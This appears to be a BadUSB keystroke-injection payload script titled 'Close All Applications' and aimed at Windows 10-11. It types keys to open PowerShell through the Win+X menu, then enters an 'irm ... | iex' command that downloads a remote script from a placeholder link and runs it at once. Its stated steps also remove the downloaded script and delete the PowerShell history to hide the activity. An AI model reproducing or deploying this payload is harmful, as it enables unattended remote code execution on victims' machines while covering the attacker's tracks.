* #####################################################
* #                                                   |
* # Title        : Close All Applications             |
* # Author       : Aleff                              |
* # Version      : 1.0                                |
* # Category     : Execution                          |
* # Target       : Windows 10-11                      |
* #                                                   |
* #####################################################

* Plug-And-Play

* 1. Open a powershell
* 2. Download a Python script
* 3. Execute it
* 4. Remove Python script downloaded
* 5. Delete powershell history


DELAY 2000
GUI x
DELAY 250
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
DELAY 1000
TAB
TAB
ENTER
DELAY 2000
* Reply with YOUR LINK. The Payload should be close_all_app.ps1
STRING irm POWERSHEL_CODE | iex
ENTER
